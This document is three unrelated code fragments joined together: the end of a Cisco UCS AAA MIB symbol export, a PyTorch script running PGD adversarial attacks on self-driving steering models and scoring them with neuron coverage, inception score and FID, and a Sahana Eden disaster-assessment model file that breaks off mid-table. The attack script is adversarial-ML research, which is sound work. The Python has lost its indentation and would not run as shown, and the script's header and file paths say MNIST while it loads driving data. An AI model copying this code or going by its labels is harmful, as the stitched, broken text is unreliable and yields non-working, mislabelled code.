cucsAaaAuthRealmFsmRmtInvRslt=cucsAaaAuthRealmFsmRmtInvRslt, cucsAaaRadiusEpFsmStageName=cucsAaaRadiusEpFsmStageName, cucsAaaUserEpName=cucsAaaUserEpName, cucsAaaEpUserEntry=cucsAaaEpUserEntry, cucsAaaShellLoginLocalHost=cucsAaaShellLoginLocalHost, cucsAaaRadiusEpFsmRmtInvRslt=cucsAaaRadiusEpFsmRmtInvRslt, cucsAaaRadiusEpFsmDn=cucsAaaRadiusEpFsmDn, cucsAaaObjects=cucsAaaObjects, cucsAaaRadiusEpFsmRmtInvErrCode=cucsAaaRadiusEpFsmRmtInvErrCode, cucsAaaSessionInfoUserType=cucsAaaSessionInfoUserType, cucsAaaRadiusEpFsmRmtRslt=cucsAaaRadiusEpFsmRmtRslt, cucsAaaUserEpFsmDescrData=cucsAaaUserEpFsmDescrData, cucsAaaLdapEpEntry=cucsAaaLdapEpEntry, cucsAaaAuthRealmFsmStageRetry=cucsAaaAuthRealmFsmStageRetry, cucsAaaRemoteUserConfigStatusMessage=cucsAaaRemoteUserConfigStatusMessage, cucsAaaCimcSessionSourceAddr=cucsAaaCimcSessionSourceAddr, cucsAaaPreLoginBannerMessage=cucsAaaPreLoginBannerMessage, cucsAaaTacacsPlusEpEntry=cucsAaaTacacsPlusEpEntry, cucsAaaLdapProviderKeySet=cucsAaaLdapProviderKeySet, cucsAaaCimcSessionDn=cucsAaaCimcSessionDn, cucsAaaUserLocaleConfigState=cucsAaaUserLocaleConfigState, cucsAaaRadiusEpFsmProgr=cucsAaaRadiusEpFsmProgr, cucsAaaUserEpFsmTaskFlags=cucsAaaUserEpFsmTaskFlags, cucsAaaSshAuthInstanceId=cucsAaaSshAuthInstanceId, cucsAaaPreLoginBannerInstanceId=cucsAaaPreLoginBannerInstanceId, cucsAaaEpFsmTaskSeqId=cucsAaaEpFsmTaskSeqId, cucsAaaModLRInstanceId=cucsAaaModLRInstanceId, cucsAaaAuthRealmFsmRmtErrDescr=cucsAaaAuthRealmFsmRmtErrDescr, cucsAaaWebLoginIntId=cucsAaaWebLoginIntId, cucsAaaRemoteUserTable=cucsAaaRemoteUserTable, cucsAaaLdapProviderOrder=cucsAaaLdapProviderOrder, cucsAaaLdapGroupRn=cucsAaaLdapGroupRn, cucsAaaDefaultAuthDescr=cucsAaaDefaultAuthDescr, cucsAaaEpUserConfigState=cucsAaaEpUserConfigState, cucsAaaLdapEpFsmEntry=cucsAaaLdapEpFsmEntry, cucsAaaTacacsPlusProviderKey=cucsAaaTacacsPlusProviderKey, cucsAaaRealmFsmStageTable=cucsAaaRealmFsmStageTable, cucsAaaSessionInfoInstanceId=cucsAaaSessionInfoInstanceId, cucsAaaUserDataPwdChangeCount=cucsAaaUserDataPwdChangeCount, cucsAaaLdapGroupDescr=cucsAaaLdapGroupDescr, cucsAaaOrgName=cucsAaaOrgName, cucsAaaPwdProfileExpirationWarnTime=cucsAaaPwdProfileExpirationWarnTime, cucsAaaProviderRefInstanceId=cucsAaaProviderRefInstanceId, cucsAaaRadiusEpFsmPrev=cucsAaaRadiusEpFsmPrev, cucsAaaCimcSessionLsDn=cucsAaaCimcSessionLsDn, cucsAaaEpAuthProfileRn=cucsAaaEpAuthProfileRn, cucsAaaAuthRealmFsmStageName=cucsAaaAuthRealmFsmStageName, cucsAaaSshAuthDn=cucsAaaSshAuthDn, cucsAaaUserRoleDescr=cucsAaaUserRoleDescr, cucsAaaDomainAuthEntry=cucsAaaDomainAuthEntry, cucsAaaLdapGroupRuleInstanceId=cucsAaaLdapGroupRuleInstanceId, cucsAaaSessionInfoAddress=cucsAaaSessionInfoAddress, cucsAaaWebLoginRemoteHost=cucsAaaWebLoginRemoteHost, cucsAaaProviderGroupDescr=cucsAaaProviderGroupDescr, cucsAaaUserEpFsmStatus=cucsAaaUserEpFsmStatus, cucsAaaEpFsmTaskItem=cucsAaaEpFsmTaskItem, cucsAaaRadiusEpFsmRn=cucsAaaRadiusEpFsmRn, cucsAaaAuthRealmFsmStageOrder=cucsAaaAuthRealmFsmStageOrder, cucsAaaAuthRealmFsmStageTable=cucsAaaAuthRealmFsmStageTable, cucsAaaTacacsPlusEpFsmProgr=cucsAaaTacacsPlusEpFsmProgr, cucsAaaLdapEpFsmRn=cucsAaaLdapEpFsmRn, cucsAaaProviderGroupRn=cucsAaaProviderGroupRn, cucsAaaRadiusEpEntry=cucsAaaRadiusEpEntry, cucsAaaSessionLRTrig=cucsAaaSessionLRTrig, cucsAaaUserRoleInstanceId=cucsAaaUserRoleInstanceId, cucsAaaDefaultAuthRealm=cucsAaaDefaultAuthRealm, cucsAaaAuthRealmInstanceId=cucsAaaAuthRealmInstanceId, cucsAaaPwdProfileTable=cucsAaaPwdProfileTable, cucsAaaRealmFsmStageInstanceId=cucsAaaRealmFsmStageInstanceId, cucsAaaUserEncPwdSet=cucsAaaUserEncPwdSet, cucsAaaEpLoginDn=cucsAaaEpLoginDn, cucsAaaTacacsPlusEpFsmStageStageStatus=cucsAaaTacacsPlusEpFsmStageStageStatus, cucsAaaRemoteUserEntry=cucsAaaRemoteUserEntry, cucsAaaRealmFsmTable=cucsAaaRealmFsmTable, cucsAaaSshAuthRn=cucsAaaSshAuthRn, cucsAaaLdapProviderPort=cucsAaaLdapProviderPort, cucsAaaLdapEpPolicyLevel=cucsAaaLdapEpPolicyLevel, cucsAaaEpUserPriv=cucsAaaEpUserPriv, cucsAaaRadiusEpPolicyOwner=cucsAaaRadiusEpPolicyOwner, cucsAaaRadiusEpFsmFsmStatus=cucsAaaRadiusEpFsmFsmStatus, cucsAaaRealmFsmRn=cucsAaaRealmFsmRn, cucsAaaShellLoginPolicyOwner=cucsAaaShellLoginPolicyOwner, cucsAaaUserLocaleName=cucsAaaUserLocaleName, cucsAaaAuthRealmDefLogin=cucsAaaAuthRealmDefLogin, cucsAaaCimcSessionRn=cucsAaaCimcSessionRn, cucsAaaEpFsmCurrentFsm=cucsAaaEpFsmCurrentFsm, cucsAaaRoleIntId=cucsAaaRoleIntId, cucsAaaRoleRn=cucsAaaRoleRn, cucsAaaExtMgmtCutThruTknDn=cucsAaaExtMgmtCutThruTknDn, cucsAaaUserEpIntId=cucsAaaUserEpIntId, cucsAaaSessionInstanceId=cucsAaaSessionInstanceId, cucsAaaPreLoginBannerPolicyOwner=cucsAaaPreLoginBannerPolicyOwner, cucsAaaEpAuthProfileDescr=cucsAaaEpAuthProfileDescr, cucsAaaUserEpFsmTaskSeqId=cucsAaaUserEpFsmTaskSeqId, cucsAaaWebLoginPolicyLevel=cucsAaaWebLoginPolicyLevel, cucsAaaShellLoginDn=cucsAaaShellLoginDn, cucsAaaRealmFsmStageDescr=cucsAaaRealmFsmStageDescr, cucsAaaAuthRealmFsmStageStageStatus=cucsAaaAuthRealmFsmStageStageStatus, cucsAaaSessionSessionTimeout=cucsAaaSessionSessionTimeout, cucsAaaTacacsPlusEpFsmStatus=cucsAaaTacacsPlusEpFsmStatus, cucsAaaRoleInstanceId=cucsAaaRoleInstanceId, cucsAaaLdapEpRn=cucsAaaLdapEpRn, cucsAaaOrgDn=cucsAaaOrgDn, cucsAaaUserRoleConfigState=cucsAaaUserRoleConfigState, cucsAaaPwdProfileEntry=cucsAaaPwdProfileEntry, cucsAaaAuthRealmFsmRn=cucsAaaAuthRealmFsmRn, cucsAaaUserPwd=cucsAaaUserPwd, cucsAaaEpFsmTaskFlags=cucsAaaEpFsmTaskFlags, cucsAaaRealmFsmStageEntry=cucsAaaRealmFsmStageEntry, cucsAaaEpFsmStageOrder=cucsAaaEpFsmStageOrder, cucsAaaDomainAuthUse2Factor=cucsAaaDomainAuthUse2Factor, cucsAaaRealmFsmTaskDn=cucsAaaRealmFsmTaskDn, cucsAaaUserLocaleDescr=cucsAaaUserLocaleDescr, cucsAaaEpAuthProfileDn=cucsAaaEpAuthProfileDn, cucsAaaUserEpFsmTry=cucsAaaUserEpFsmTry, cucsAaaRadiusEpFsmRmtInvErrDescr=cucsAaaRadiusEpFsmRmtInvErrDescr, cucsAaaLdapEpFsmStageRn=cucsAaaLdapEpFsmStageRn, cucsAaaRealmFsmCurrentFsm=cucsAaaRealmFsmCurrentFsm, cucsAaaLogPurgeWindow=cucsAaaLogPurgeWindow, cucsAaaUserRn=cucsAaaUserRn, cucsAaaUserEpFsmRmtInvErrCode=cucsAaaUserEpFsmRmtInvErrCode)
mibBuilder.exportSymbols("CISCO-UNIFIED-COMPUTING-AAA-MIB", cucsAaaExtMgmtCutThruTknPolicyOwner=cucsAaaExtMgmtCutThruTknPolicyOwner, cucsAaaRealmFsmStageOrder=cucsAaaRealmFsmStageOrder, cucsAaaRadiusEpFsmCurrentFsm=cucsAaaRadiusEpFsmCurrentFsm, cucsAaaTacacsPlusEpFsmCurrentFsm=cucsAaaTacacsPlusEpFsmCurrentFsm, cucsAaaUserEpFsmStageDescr=cucsAaaUserEpFsmStageDescr, cucsAaaUserDataDescr=cucsAaaUserDataDescr)
|
# PGD + Diversity Regularization on MNIST
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
from torchvision.datasets import DatasetFolder, ImageFolder
import numpy as np
import matplotlib.pyplot as plt
import traceback
import warnings
warnings.filterwarnings('ignore')
import datetime
import glob
import os
import pickle
import pandas as pd
from models import *
from div_attacks import *
from neuron_coverage import *
from inception_score import *
from fid_score import *
from utils import *
# check if CUDA is available
device = torch.device("cpu")
use_cuda = False
if torch.cuda.is_available():
print('CUDA is available!')
device = torch.device("cuda")
use_cuda = True
else:
print('CUDA is not available.')
random_seed = 1
torch.manual_seed(random_seed)
date = datetime.date.today()
data_dir = 'data/udacity_self_driving_car'
targets_file = 'targets.csv'
batch_size = 32
dataset = car_loader(target_csv_file=os.path.join(data_dir, targets_file),
img_dir=os.path.join(data_dir, 'data'),
device=device,
num_classes=25,
transform=transforms.Compose([transforms.ToTensor(),
transforms.ToPILImage(),
transforms.Resize((100,100)),
transforms.ToTensor()]))
test_loader = DataLoader(dataset, batch_size=batch_size)
# Generate a custom batch to ensure that each "class" of steering angles is equally represented
num_per_class = 4
class_distribution = torch.ones(dataset.num_classes) * num_per_class
inputs, targets, classes = generate_batch_reg(dataset, class_distribution, device)
# # Load Pretrained Models if available
## Dave_orig
dave_o = Dave_orig().to(device)
dave_o = get_pretrained_weights(dave_o, device, 'pretrained_models/driving/')
## Dave_norminit
dave_n = Dave_norminit().to(device)
dave_n = get_pretrained_weights(dave_n, device, 'pretrained_models/driving/')
# # Attack Time
def main():
models = [dave_o, dave_n]
# attack params
epsilon = 100.
num_steps = 20
step_size = 0.01
log_frequency = 100
# primary evaluation criteria
attack_versions = [pgd_attack_reg]
reg_weights = [0, 1, 10, 100, 1000, 10000, 100000, 1000000]
epsilons = [0.1, 0.2, 0.3]
# neuron coverage params
nc_threshold = 0. # all activations are scaled to (0,1) after relu
# inception score (is) params
is_cuda = use_cuda
is_batch_size = 10
is_resize = True
is_splits = 10
# frechet inception distance score (fid) params
real_path = "temp_imgs/mnist/real_pgd_driving/"
fake_path = "temp_imgs/mnist/fake_pgd_driving/"
fid_batch_size = 64
fid_cuda = use_cuda
with open('logs/pgd_mnist_error_log_' + str(date) + '.txt', 'w') as error_log:
for model in models:
results = []
model_name = model.__class__.__name__
save_file_path = 'assets/pgd_results_driving_' + model_name + '_' + str(date) + '.pkl'
# neuron coverage
covered_neurons, total_neurons, neuron_coverage_000 = eval_nc(model, inputs, 0.00)
print('neuron_coverage_000:', neuron_coverage_000)
covered_neurons, total_neurons, neuron_coverage_020 = eval_nc(model, inputs, 0.20)
print('neuron_coverage_020:', neuron_coverage_020)
covered_neurons, total_neurons, neuron_coverage_050 = eval_nc(model, inputs, 0.50)
print('neuron_coverage_050:', neuron_coverage_050)
covered_neurons, total_neurons, neuron_coverage_075 = eval_nc(model, inputs, 0.75)
print('neuron_coverage_075:', neuron_coverage_075)
init = {'desc': 'Initial inputs, targets, classes',
'inputs': inputs,
'targets': targets,
'classes': classes,
'neuron_coverage_000': neuron_coverage_000,
'neuron_coverage_020': neuron_coverage_020,
'neuron_coverage_050': neuron_coverage_050,
'neuron_coverage_075': neuron_coverage_075}
results.append(init)
n=2 # skip relu layers
layer_dict = get_model_modules(model)
target_layers = list(layer_dict)[0::n]
for attack in attack_versions:
for layer_idx in target_layers:
module = layer_dict[layer_idx]
for rw in reg_weights:
for e in epsilons:
try:
timestamp = str(datetime.datetime.now()).replace(':','.')
attack_detail = ['model', model_name,
'timestamp', timestamp,
'attack', attack.__name__,
'layer: ', layer_idx,
'regularization_weight: ', rw,
'epsilon: ', e]
print(*attack_detail, sep=' ')
# adversarial attack
orig_err, pgd_err, adversaries = attack(model,
module,
rw,
inputs,
targets,
device,
epsilon=e,
num_steps=num_steps,
step_size=step_size,
log_frequency=log_frequency)
# evaluate adversary effectiveness
mse, pert_acc, orig_acc = eval_performance_reg(model, inputs, adversaries, targets, classes, dataset)
# sample_3D_images_reg(model, inputs, adversaries, targets, classes, dataset)
pert_acc = pert_acc.item() / 100.
orig_acc = orig_acc.item() / 100.
attack_success_rate = 1 - pert_acc
# neuron coverage
covered_neurons, total_neurons, neuron_coverage_000 = eval_nc(model, adversaries, 0.00)
print('neuron_coverage_000:', neuron_coverage_000)
covered_neurons, total_neurons, neuron_coverage_020 = eval_nc(model, adversaries, 0.20)
print('neuron_coverage_020:', neuron_coverage_020)
covered_neurons, total_neurons, neuron_coverage_050 = eval_nc(model, adversaries, 0.50)
print('neuron_coverage_050:', neuron_coverage_050)
covered_neurons, total_neurons, neuron_coverage_075 = eval_nc(model, adversaries, 0.75)
print('neuron_coverage_075:', neuron_coverage_075)
# inception score
preprocessed_advs = preprocess_3D_imgs(adversaries)
mean_is, std_is = inception_score(preprocessed_advs, is_cuda, is_batch_size, is_resize, is_splits)
print('inception_score:', mean_is)
# fid score
paths = [real_path, fake_path]
# dimensionality = 64
target_num = 64
generate_imgs(inputs, real_path, target_num)
generate_imgs(adversaries, fake_path, target_num)
fid_score_64 = calculate_fid_given_paths(paths, fid_batch_size, fid_cuda, dims=64)
print('fid_score_64:', fid_score_64)
# dimensionality = 2048
target_num = 2048
generate_imgs(inputs, real_path, target_num)
generate_imgs(adversaries, fake_path, target_num)
fid_score_2048 = calculate_fid_given_paths(paths, fid_batch_size, fid_cuda, dims=2048)
print('fid_score_2048:', fid_score_2048)
# output impoartiality
pert_output = model(adversaries)
y_pred = discretize(pert_output, dataset.boundaries).view(-1)
output_impartiality, y_pred_entropy, max_entropy = calculate_output_impartiality(classes, y_pred)
print('output_impartiality:', output_impartiality)
out = {'timestamp': timestamp,
'attack': attack.__name__,
'model': model_name,
'layer': layer_idx,
'regularization_weight': rw,
'epsilon': e,
'adversaries': adversaries,
'pert_acc':pert_acc,
'orig_acc': orig_acc,
'attack_success_rate': attack_success_rate,
'neuron_coverage_000': neuron_coverage_000,
'neuron_coverage_020': neuron_coverage_020,
'neuron_coverage_050': neuron_coverage_050,
'neuron_coverage_075': neuron_coverage_075,
'inception_score': mean_is,
'fid_score_64': fid_score_64,
'fid_score_2048': fid_score_2048,
'output_impartiality': output_impartiality}
results.append(out)
# save incremental outputs
with open(save_file_path, 'wb') as handle:
pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)
except Exception as e:
print(str(traceback.format_exc()))
error_log.write("Failed on attack_detail {0}: {1}\n".format(str(attack_detail), str(traceback.format_exc())))
finally:
pass
if __name__ == '__main__':
try:
main()
except Exception as e:
print(traceback.format_exc())
|
# -*- coding: utf-8 -*-
"""
Assessments
This module currently contains 2 types of Assessments
* Flexible Impact Assessments (including Mobile access)
* Rapid Assessment Tool (from ECB: http://www.ecbproject.org/page/48)
@ToDo: Migrate this to a Template in the Survey module
@ToDo Validation similar to sitrep_school_report_onvalidation()
http://bazaar.launchpad.net/~flavour/sahana-eden/trunk/annotate/head:/models/sitrep.py#L99
It also contains some Baseline Data:
* Populations
http://eden.sahanafoundation.org/wiki/BluePrintBaselineData
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
# Define the Model
# @ToDo: Move to modules/s3db/assess.py
# - here it isn't visible to s3db.load_all_models() or Sync
# -----------------------------------------------------------------------------
assess_severity_opts = {
0: T("Low"),
1: T("Medium"),
2: T("High"),
3: T("Very High"),
}
assess_colour_opts = {
0:"green",
1:"yellow",
2:"orange",
3:"red"
}
def s3_assess_severity_represent(value):
if value:
return IMG(_src="/%s/static/img/%s_circle_16px.png" %
(appname, assess_colour_opts[value]),
_alt= value,
_align="middle"
)
else:
return NONE
repr_select = lambda l: len(l.name) > 48 and "%s..." % l.name[:44] or l.name
S3Represent = s3base.S3Represent
add_components = s3db.add_components
configure = s3db.configure
crud_strings = s3.crud_strings
define_table = db.define_table
location_id = s3db.gis_location_id
person_id = s3db.pr_person_id
organisation_id = s3db.org_organisation_id
organisation_represent = s3db.org_organisation_represent
sector_id = s3db.org_sector_id
human_resource_id = s3db.hrm_human_resource_id
ireport_id = s3db.irs_ireport_id
# Impact as component of assessments
add_components("assess_assess", impact_impact="assess_id")
def assess_tables():
""" Load the Assess Tables when needed """
module = "assess"
# =========================================================================
# Flexible Impact Assessments
# =========================================================================
# Assessment
#
resourcename = "assess"
tablename = "assess_assess"
define_table(tablename,
Field("datetime", "datetime",
label = T("Date & Time"),
default = request.utcnow),
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
organisation_id(widget = S3OrganisationAutocompleteWidget(default_from_profile=True)),
person_id("assessor_person_id",
label = T("Assessor"),
default = s3_logged_in_person()),
s3_comments(),
ireport_id(), # Assessment can be linked to an Incident Report
*s3_meta_fields())
assess_id = S3ReusableField("assess_id", "reference %s" % tablename,
requires = IS_NULL_OR(
IS_ONE_OF(db, "assess_assess.id", "%(id)s")
),
represent = lambda id: id,
label = T("Assessment"),
ondelete = "RESTRICT")
# CRUD strings
ADD_ASSESSMENT = T("Add Assessment")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESSMENT,
title_display = T("Assessment Details"),
title_list = T("Assessments"),
title_update = T("Edit Assessment"),
label_list_button = T("List Assessments"),
label_delete_button = T("Delete Assessment"),
msg_record_created = T("Assessment added"),
msg_record_modified = T("Assessment updated"),
msg_record_deleted = T("Assessment deleted"),
msg_list_empty = T("No Assessments currently registered"),
name_nice = T("Assessment"),
name_nice_plural = T("Assessments"))
# assess_assess as component of org_organisation
add_components("org_organisation", assess_assess="organisation_id")
# Hide Add Assessment functionality. Users should only add assessments
# through the Basic Assessment.
configure(tablename,
insertable=False)
# =========================================================================
# Baseline Type
#
tablename = "assess_baseline_type"
define_table(tablename,
Field("name", length=128, notnull=True, unique=True),
*s3_meta_fields())
# CRUD strings
ADD_BASELINE_TYPE = T("Add Baseline Type")
crud_strings[tablename] = Storage(
label_create = ADD_BASELINE_TYPE,
title_display = T("Baseline Type Details"),
title_list = T("Baseline Types"),
title_update = T("Edit Baseline Type"),
label_list_button = T("List Baseline Types"),
label_delete_button = T("Delete Baseline Type"),
msg_record_created = T("Baseline Type added"),
msg_record_modified = T("Baseline Type updated"),
msg_record_deleted = T("Baseline Type deleted"),
msg_list_empty = T("No Baseline Types currently registered"),
name_nice = T("Baseline Type"),
name_nice_plural = T("Baseline Types"))
def baseline_type_comment():
# ToDo: Is this membership check required?
if auth.has_membership(auth.id_group("'Administrator'")):
return S3AddResourceLink(c="assess",
f="baseline_type",
label=ADD_BASELINE_TYPE)
else:
return None
represent = S3Represent(tablename)
baseline_type_id = S3ReusableField("baseline_type_id", "reference %s" % tablename,
sortby="name",
requires = IS_NULL_OR(IS_ONE_OF(db,
"assess_baseline_type.id",
represent,
sort=True)),
represent = represent,
label = T("Baseline Type"),
comment = baseline_type_comment(),
ondelete = "RESTRICT"
)
# =========================================================================
# Baseline
#
tablename = "assess_baseline"
define_table(tablename,
# Hide FK fields in forms
assess_id(readable = False, writable = False),
baseline_type_id(),
Field("value", "double"),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_BASELINE = T("Add Baseline")
crud_strings[tablename] = Storage(
label_create = ADD_BASELINE,
title_display = T("Baselines Details"),
title_list = T("Baselines"),
title_update = T("Edit Baseline"),
label_list_button = T("List Baselines"),
label_delete_button = T("Delete Baseline"),
msg_record_created = T("Baseline added"),
msg_record_modified = T("Baseline updated"),
msg_record_deleted = T("Baseline deleted"),
msg_list_empty = T("No Baselines currently registered"),
name_nice = T("Baseline"),
name_nice_plural = T("Baselines"))
# Baseline as component of assessments
add_components("assess_assess", assess_baseline="assess_id")
# =========================================================================
# Summary
#
tablename = "assess_summary"
define_table(tablename,
assess_id(readable = False, writable = False),
sector_id(),
#Field("value", "double"),
Field("value", "integer",
default = 0,
label = T("Severity"),
requires = IS_EMPTY_OR(IS_IN_SET(assess_severity_opts)),
widget = SQLFORM.widgets.radio.widget,
represent = s3_assess_severity_represent),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_ASSESS_SUMMARY = T("Add Assessment Summary")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESS_SUMMARY,
title_display = T("Assessment Summary Details"),
title_list = T("Assessment Summaries"),
title_update = T("Edit Assessment Summary"),
label_list_button = T("List Assessment Summaries"),
label_delete_button = T("Delete Assessment Summary"),
msg_record_created = T("Assessment Summary added"),
msg_record_modified = T("Assessment Summary updated"),
msg_record_deleted = T("Assessment Summary deleted"),
msg_list_empty = T("No Assessment Summaries currently registered"),
name_nice = T("Assessment"),
name_nice_plural = T("Assessments"))
# Summary as component of assessments
add_components("assess_assess", assess_summary="assess_id")
# Pass variables back to global scope (response.s3.*)
return dict(
assess_id = assess_id
)
# =========================================================================
# Rapid Assessment Tool
# =========================================================================
def rat_tables():
""" Load the RAT Tables when needed """
module = "assess"
# Load the models we depend on
if settings.has_module("cr"):
shelter_id = s3db.shelter_id
if settings.has_module("hrm"):
human_resource_id = s3db.hrm_human_resource_id
else:
human_resource_id = s3db.pr_person_id
# Section CRUD strings
ADD_SECTION = T("Add Section")
rat_section_crud_strings = Storage(
label_create = ADD_SECTION,
title_display = T("Section Details"),
title_list = T("Sections"),
title_update = "",
label_list_button = T("List Sections"),
label_delete_button = T("Delete Section"),
msg_record_created = T("Section updated"),
msg_record_modified = T("Section updated"),
msg_record_deleted = T("Section deleted"),
msg_list_empty = T("No Sections currently registered"),
name_nice = T("Search"),
name_nice_plural = T("Searches"))
# -------------------------------------------------------------------------
# Common options
rat_walking_time_opts = {
1: T("0-15 minutes"),
2: T("15-30 minutes"),
3: T("30-60 minutes"),
4: T("over one hour"),
999: NOT_APPLICABLE
}
# -------------------------------------------------------------------------
# Helper functions
def rat_represent_multiple(set, opt):
"""
Represent an IS_IN_SET with multiple=True as
comma-separated list of options
@param set: the options set as dict
@param opt: the selected option(s)
"""
if isinstance(opt, (list, tuple)):
opts = opt
vals = [str(set.get(o, o)) for o in opts]
#elif isinstance(opt, basestring):
# opts = opt.split("|")
# vals = [str(set.get(int(o), o)) for o in opts if o]
elif isinstance(opt, int):
opts = [opt]
vals = str(set.get(opt, opt))
else:
return T("None")
if len(opts) > 1:
vals = ", ".join(vals)
else:
vals = len(vals) and vals[0] or ""
return vals
def rat_tooltip(tooltip, multiple=False):
"""
Prepare tooltip
"""
if multiple:
comment = DIV("(%s)" % T("Select all that apply"),
DIV(_class="tooltipbody",
_title="|%s" % T(tooltip)))
else:
comment = DIV(DIV(_class="tooltipbody",
_title="|%s" % T(tooltip)))
return comment
def rat_label_and_tooltip(label, tooltip, multiple=False):
"""
Prepare tooltip that incorporates a field's label
"""
label = T(label)
if multiple:
comment = DIV("(%s)" % T("Select all that apply"),
DIV(_class="tooltip",
_title="%s|%s" % (T(label), T(tooltip))))
else:
comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (T(label), T(tooltip))))
return {"label": label, "comment": comment}
rat_interview_location_opts = {
1:T("Village"),
2:T("Urban area"),
3:T("Collective center"),
4:T("Informal camp"),
5:T("Formal camp"),
6:T("School"),
7:T("Mosque"),
8:T("Church"),
99:T("Other")
}
rat_interviewee_opts = {
1:T("Male"),
2:T("Female"),
3:T("Village Leader"),
4:T("Informal Leader"),
5:T("Community Member"),
6:T("Religious Leader"),
7:T("Police"),
8:T("Healthcare Worker"),
9:T("School Teacher"),
10:T("Womens Focus Groups"),
11:T("Child (< 18 yrs)"),
99:T("Other")
}
rat_accessibility_opts = {
1:T("2x4 Car"),
2:T("4x4 Car"),
3:T("Truck"),
4:T("Motorcycle"),
5:T("Boat"),
6:T("Walking Only"),
7:T("No access at all"),
99:T("Other")
}
# Main Resource -----------------------------------------------------------
# contains Section 1: Identification Information
#
tablename = "assess_rat"
define_table(tablename,
Field("date", "date",
requires = [IS_DATE(format = settings.get_L10n_date_format()),
IS_NOT_EMPTY()],
default = datetime.datetime.today()),
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
human_resource_id("staff_id", label=T("Staff")),
human_resource_id("staff2_id", label=T("Staff2")),
Field("interview_location", "list:integer",
label = T("Interview taking place at"),
requires = IS_NULL_OR(IS_IN_SET(rat_interview_location_opts,
multiple=True,
zero=None)),
#widget = SQLFORM.widgets.checkboxes.widget,
represent = lambda opt, set=rat_interview_location_opts: \
rat_represent_multiple(set, opt),
comment = "(%s)" % T("Select all that apply")),
Field("interviewee", "list:integer",
label = T("Person interviewed"),
requires = IS_NULL_OR(IS_IN_SET(rat_interviewee_opts,
multiple=True,
zero=None)),
#widget = SQLFORM.widgets.checkboxes.widget,
represent = lambda opt, set=rat_interviewee_opts: \
rat_represent_multiple(set, opt),
comment = "(%s)" % T("Select all that apply")),
Field("accessibility", "integer",
label = T("Accessibility of Affected Location"),
requires = IS_NULL_OR(IS_IN_SET(rat_accessibility_opts,
zero=None)),
represent = lambda opt: rat_accessibility_opts.get(opt, opt)),
s3_comments(),
#document_id(), # Better to have multiple Documents on a Tab
s3db.shelter_id(),
*s3_meta_fields())
# CRUD strings
ADD_ASSESSMENT = T("Add Rapid Assessment")
crud_strings[tablename] = Storage(
label_create = ADD_ASSESSMENT,
title_display = T("Rapid Assessment Details"),
title_list = T("Rapid Assessments"),
title_update = T("Edit Rapid Assessment"),
label_list_button = T("List Rapid Assessments"),
label_delete_button = T("Delete Rapid Assessment"),
msg_record_created = T("Rapid Assessment added"),
msg_record_modified = T("Rapid Assessment updated"),
msg_record_deleted = T("Rapid Assessment deleted"),
msg_list_empty = T("No Rapid Assessments currently registered"),
name_nice = T("Rapid Assessment"),
name_nice_plural = T("Rapid Assessments"))
# -------------------------------------------------------------------------
def rat_assessment_onaccept(form):
id = form.vars.get("id", None)
if id:
for x in xrange(2, 10):
section = "assess_section%s" % x
set = db(db[section].assessment_id == id)
record = set.select(db[section].id, limitby=(0, 1)).first()
if not record:
db[section].insert(assessment_id=id)
# -------------------------------------------------------------------------
def rat_represent(id):
""" Represent assessment as string """
table = db.assess_rat
row = db(table.id == id).select(table.date,
table.staff_id,
table.staff2_id,
table.location_id,
limitby = (0, 1)).first()
if row:
date = row.date and str(row.date) or ""
location = row.location_id and s3db.gis_LocationRepresent()(row.location_id) or ""
table = db.org_staff
org = ["", ""]
i = 0
for staff_id in [row.staff_id, row.staff2_id]:
if staff_id:
staff = db(table.id == staff_id).select(table.organisation_id,
limitby=(0, 1)).first()
if staff:
i += 1
org[i] = organisation_represent(staff.organisation_id)
assessment_represent = XML("<div>%s %s, %s %s</div>" % (location, org[0], org[1], date))
else:
assessment_represent = NONE
return assessment_represent
# -------------------------------------------------------------------------
# re-usable field
assessment_id = S3ReusableField("assessment_id", "reference %s" % tablename,
requires = IS_NULL_OR(
IS_ONE_OF(db, "assess_rat.id",
rat_represent,
orderby="assess_rat.id")
),
#represent = rat_represent,
readable = False, writable = False,
#label = T("Rapid Assessment"),
#comment = A(ADD_ASSESSMENT,
# _class="s3_add_resource_link",
# _href=URL(c="assess", f="rat",
# args="create",
# vars=dict(format="popup")),
# _target="top",
# _title=ADD_ASSESSMENT),
ondelete = "RESTRICT")
# Assessment as component of cr_shelter.
# RAT has components itself, so best not to constrain within the parent resource tabs
# - therefore disable the listadd & jump out of the tabs for Create/Update
add_components("cr_shelter", assess_rat="shelter_id")
configure(tablename,
listadd=False, # We override this in the RAT controller for when not a component
onaccept=rat_assessment_onaccept)
# Section 2: Demographic --------------------------------------------------
tablename = "assess_section2"
define_table(tablename,
assessment_id(),
Field("population_total", "integer",
label = T("Total population of site visited"),
comment = T("people")),
Field("households_total", "integer",
label = T("Total # of households of site visited"),
comment = T("households")),
Field("population_affected", "integer",
label = T("Estimated # of people who are affected by the emergency"),
comment = T("people")),
Field("households_affected", "integer",
label = T("Estimated # of households who are affected by the emergency"),
comment = T("households")),
Field("male_05", "double",
label = T("Number/Percentage of affected population that is Male & Aged 0-5")),
Field("male_612", "double",
label = T("Number/Percentage of affected population that is Male & Aged 6-12")),
Field("male_1317", "double",
label = T("Number/Percentage of affected population that is Male & Aged 13-17")),
Field("male_1825", "double",
label = T("Number/Percentage of affected population that is Male & Aged 18-25")),
Field("male_2660", "double",
label = T("Number/Percentage of affected population that is Male & Aged 26-60")),
Field("male_61", "double",
label = T("Number/Percentage of affected population that is Male & Aged 61+")),
Field("female_05", "double",
label = T("Number/Percentage of affected population that is Female & Aged 0-5")),
Field("female_612", "double",
label = T("Number/Percentage of affected population that is Female & Aged 6-12")),
Field("female_1317", "double",
label = T("Number/Percentage of affected population that is Female & Aged 13-17")),
Field("female_1825", "double",
label = T("Number/Percentage of affected population that is Female & Aged 18-25")),
Field("female_2660", "double",
label = T("Number/Percentage of affected population that is Female & Aged 26-60")),
Field("female_61", "double",
